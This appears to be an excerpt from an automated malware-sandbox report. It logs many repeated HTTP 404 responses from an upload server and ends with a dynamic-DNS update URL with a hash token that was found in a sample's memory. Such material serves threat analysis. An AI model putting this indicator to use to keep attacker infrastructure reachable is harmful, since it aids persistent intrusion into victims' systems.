                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:23:46 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-F8jo_QnAwesnAN858b8Wbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC5WJGXwo2vmxjLMj8mGNy0sEowhjmmIR-1EG5yxlVQ1OdklsDsFvUA6Amis4WIJhW9zpyKbbK2unAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:23:46 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-e68TODCjM1OVanXeHrZZDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC6y7Wk_LQrmjd-nTkB_x27OFBKo3YevUMeNkgQpmeOBgss5xjzdLVNaKltTHcF3px23SDe5q9_wugServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:24:39 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-AXOcV9wyGwdCymktj_6gUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AHmUCY2fNxGDNaLGlwv-TJfxyGE-cwJpC7cWl4Fq3oUL2VGdOdkwx4vIOliYlofWiMOgEaUQWyYLSHMGrQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:24:39 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EgrMCGhrmLQahhkRUwERpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC7Wo2brYXRJwVxL_l2i0-lTcBXlfxR5iGrJWNm24tMZaMhpUB2_xZnTIjlJWI6tEPBoN0oVN_8OvQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:24:41 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-m2zkC3NgxTn4_8r2XJXq3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AHmUCY2YPSzXo_UwscI0FbetXZetjMTwh_wBqDeFfckri-ekjuYkKerwgLE-eBw4W1JcFgPaUgmb3vb9fgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:24:42 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-B65aVVSftE18NG4XnnqHmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC440Or8D_Xo1vkwy3oSVVMg4teih-up4EWiKSW4kKpvQ-WmgIZ2XEm6lGB-AQduE-eb_j7IIG0LwwServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:24:43 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-DePdxBrWSkSAIdJ0sgC5jg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AHmUCY1Ka-ayYgy0gFTLLMc0oDM5XwWrGj7J1AfZzthJRsamnkaOpvBCd8ybDPbmOA9QUBBiF1PnKsDOMgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:24:44 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-EfU79X79u7E4LbcOEOBvKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652X-GUploader-UploadID: AHmUCY2kNgbFRD3DrajNVR7pKKXqnrwQIaRfV-7W54qyac6MQopila7ozQVqExmAJIQV9H6NBjrZyRUUJQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:24:44 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-BZb41KUFe5fWsptmquap-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC66h55eqZ_-Meiab5NlnUvBU2DlY0k5vm1dRiGOkMs7WrRwUFaSgZmBgB7Ab-bFDOfwYpgyiAYMCAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:24:47 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-GSspKMEed1hW17M9WZqHKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC4XgHu6N_GiFRwPhIVKWBfs5PjE30JK02AeTdz1IAlkDomta8iULcZDqVa9w8ELGkiKQyYWVgI9gQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:24:47 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Xq7dQqTe4udJyr3EShS-JA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AHmUCY2u6Q6KOEoywHhhCEoFTllfsxPPWjP88cfeHf-MumgkSUTi9Qkt3Z5B6hISWL-_l-o3zVBStXFY8QServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:24:48 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-0lLmqkjAYdD9a1wf_16kxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AHmUCY2gfXjWVDAsqeofbTuVqFphx1TFpghy6AWjWV0geGgt_sX12RDY2r7bJFc1qhebvbnuRIqjNYnTTAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:24:50 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-WZB61sqAPRaZ2uf0bVWzAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC4Y-IvMWVFf9aaqAe8mAA624S-jRhspD1IXCscQqxvOfD6snMaNAN4AX5yYwRxmhdf6nSFoCImaRgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:24:51 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-6Kb6zbEz4sL8FB2YC-a5gQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC7MYxQcydIZKLetSa5-de378R2mvWCCb2-STEDFpICE_wDiN4FsdsfkUyX6gngmNxIK8IasWoWMygServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:24:51 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-788NdEtxmJRSMa1K8gDteA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC4qTf-Qr1E_o4h5CVpliZNhp93BqEgIkZCFrDGYI11SWM1QJ7lVlfD3WzqM4C9Ya7PulAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:24:52 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-j5OKsjH9Kz7eZOLQWytnRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AHmUCY19QKT9CqoHQA0iFf9UiWY6F8U_9px8BI18Hf7_xfJp20V3zqqr04gkGHrvnKS0rVFHkqDiN8PzKgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:24:54 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-nhbmjDzFrDeMuU3TohqEUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC70rmNBiR7HW2SdocN52PqLfAlSsPnxEL3xZisCwhpeomv3BQ_R0RqGTY1wG5pWTb7xI4U4YAbgKwServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:24:54 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-uK2LjODbDS-VC5E_j4VEhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC4IlEjYGDmVbInMIzK4HJZnDbC0Fb9RREw5ZwQVjLrXLsMyViomF5siUQLv5farhx91eldIup9gNAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:24:55 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-4SbtQDw3nFf0L-Wy_13fXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC4Ccf_6fTikse9D89A8RhnGqN6OUlM5KTWwOMYUTCqGjrguEJRcS-F3hvK349AxLvyIWz4Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 15 Nov 2024 10:24:55 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-buHdELXmwnKyzgaK_4pAKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AHmUCY3vseVn7E1DLE9NOajKg5lH241OAT8_3y-d4aocJvF51rf5atkl7bL-2rNE5dgi7TtC02ZtxYpUwwServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: ~$cache1.20.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
